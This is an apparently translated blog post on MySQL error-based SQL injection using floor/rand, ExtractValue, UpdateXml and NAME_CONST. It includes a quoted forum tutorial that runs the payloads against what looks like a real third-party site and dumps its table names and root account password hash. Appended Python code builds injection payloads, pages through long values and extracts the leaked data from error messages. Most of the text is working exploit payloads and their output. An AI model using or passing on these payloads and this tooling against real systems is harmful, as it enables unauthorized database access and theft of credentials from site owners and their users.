
MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error techniques

Posted 2015-11-11 19:03:37

1. Error via floor

The following payloads can be used (the second one supplies its own three-row derived table instead of relying on information_schema.tables):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message (the trailing 1 is the floor(rand(0)*2) value, not part of the data). To read other data, replace version() with the subquery you want evaluated. The table in the inner FROM must return at least three rows for the duplicate key to occur; information_schema.tables always does, and Method 2 below builds a three-row table with a union instead.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. Error via ExtractValue

ExtractValue() and UpdateXml() exist from MySQL 5.1.5. Both parse their XPath argument, and an invalid expression is echoed back in the error message; the 0x5c (backslash) or 0x3a (colon) prefix guarantees the expression is invalid. The message shows at most 32 characters, so longer values have to be paged out with substr().

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. Error via UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Additional collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
MySQL error-based injection on newer versions: injection via NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
. J0 e7 N( P1 C  f+ F

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
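The duplicate-entry error behind the floor technique in section 1, as an added example that is not part of the original post: a short Python model of the explanation usually given for it. The rand(0) values are the published deterministic output of MySQL's floor(rand(0)*2); the "evaluate the key once to probe, once more to insert" behaviour of GROUP BY is modelled from that explanation, not reproduced from server code. It shows why two source rows never fail and three do, and why the leaked value arrives with a trailing digit.

```python
"""Model of why
  select count(*), concat(version(), floor(rand(0)*2)) x
  from information_schema.tables group by x
fails with ERROR 1062 "Duplicate entry ... for key 'group_key'".

Added example, not code from the original post. The usual explanation,
modelled here (an assumption about server internals, not server code):
while aggregating, MySQL evaluates the GROUP BY key expression once to look
it up in its temporary table and, on a miss, evaluates it again when
inserting the new group row. With a key built from rand(0) the two
evaluations can differ, so an already-present key can be inserted twice.
"""

# The first values of floor(rand(0)*2) that MySQL produces for seed 0.
# rand(0) is deterministic; these are the well-known published values.
FLOOR_RAND0_X2 = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1]


def group_by_nondeterministic_key(rows, rand_values, prefix):
    """Simulate the aggregation over `rows` source rows.

    Returns the temporary table (group key -> count(*)) on success, or the
    text of the duplicate-entry error MySQL would raise.
    """
    tmp = {}
    it = iter(rand_values)
    for _ in range(rows):
        key = prefix + str(next(it))   # evaluation 1: probe the temp table
        if key in tmp:
            tmp[key] += 1              # hit: count(*) is incremented
            continue
        key = prefix + str(next(it))   # evaluation 2: the key actually inserted
        if key in tmp:                 # may now collide with an earlier insert
            return "ERROR 1062 (23000): Duplicate entry '%s' for key 'group_key'" % key
        tmp[key] = 1
    return tmp


if __name__ == "__main__":
    # Two rows never collide: probe 0 -> miss -> insert 1; probe 1 -> hit.
    print(group_by_nondeterministic_key(2, FLOOR_RAND0_X2, "v"))
    # Three rows: the third probe (0) misses, and the re-evaluation (1)
    # inserts a key that already exists. This is the error seen in the post.
    print(group_by_nondeterministic_key(3, FLOOR_RAND0_X2, "5.1.33-community-log"))
```

Run with three rows the model produces exactly the message quoted in section 1, including the trailing 1 that must be stripped from the leaked value. The same model explains why rand() without a seed only fails some of the time: the two evaluations then collide by chance rather than by schedule.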
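Building the four payload shapes used on this page (floor, ExtractValue, UpdateXml, NAME_CONST) and recovering the leaked value from each error text, as an added example that is neither the post's nor the quoted tutorial's code. The helper names are my own; the 0x7e ('~') delimiter and the substr() paging for the 32-character XPath limit are my choices, and the error strings used below are constructed to mirror those quoted on the page.

```python
"""Payload builders and error parser for MySQL error-based injection.
Added example; not from the original post. Function names are the author's
own. Payload shapes follow the page; `subquery` is the attacker-controlled
SELECT whose single value should come back in the error text."""
import re


def floor_payload(subquery):
    """count(*)/group by/floor(rand(0)*2): needs >= 3 rows in the inner FROM."""
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % subquery)


def extractvalue_payload(subquery, offset=1, width=31):
    """0x7e ('~') makes the XPath invalid so the value is echoed in the error.
    The XPATH syntax error shows at most 32 characters, so long values are
    paged with substr(): 1 delimiter + 31 data characters per request."""
    return "and extractvalue(1,concat(0x7e,substr((%s),%d,%d)))" % (subquery, offset, width)


def updatexml_payload(subquery, offset=1, width=31):
    """Same echo-in-error behaviour and the same 32-character limit."""
    return "and 1=(updatexml(1,concat(0x7e,substr((%s),%d,%d)),1))" % (subquery, offset, width)


def name_const_payload(subquery):
    """Two NAME_CONST columns with the same leaked name -> 'Duplicate column name'.
    Newer MySQL builds reject non-constant NAME_CONST arguments, which is
    the 'invalid calls' failure the quoted tutorial mentions."""
    return ("and 1=(select * from (select NAME_CONST((%s),1),NAME_CONST((%s),1)) as x)"
            % (subquery, subquery))


# (pattern, extractor) pairs for the three error shapes quoted on the page.
_PATTERNS = [
    # floor technique: the trailing digit is floor(rand(0)*2), not data
    (re.compile(r"Duplicate entry ['\u2019](.*)['\u2019] for key ['\u2019]group_key['\u2019]"),
     lambda m: m.group(1)[:-1]),
    # extractvalue / updatexml: first char is the delimiter (\, : or ~)
    (re.compile(r"XPATH syntax error: ['\u2019][\\:~](.*)['\u2019]"),
     lambda m: m.group(1)),
    # name_const technique
    (re.compile(r"Duplicate column name ['\u2019](.*)['\u2019]"),
     lambda m: m.group(1)),
]


def leaked_value(error_text):
    """Return the data carried by a MySQL error message, or None when the
    text is not one of the three recognised error shapes."""
    for pattern, extract in _PATTERNS:
        m = pattern.search(error_text)
        if m:
            return extract(m)
    return None


if __name__ == "__main__":
    # Constructed error strings mirroring the ones quoted on the page.
    for err in [
        "ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'",
        "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
        "Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'",
    ]:
        print(repr(leaked_value(err)))
    print(extractvalue_payload("select pass from admin limit 1", offset=32))
```

To dump a value longer than 31 characters with the XPath functions, call extractvalue_payload() with offset 1, 32, 63, ... and concatenate the pieces leaked_value() returns; a page that comes back shorter than 31 characters is the last one.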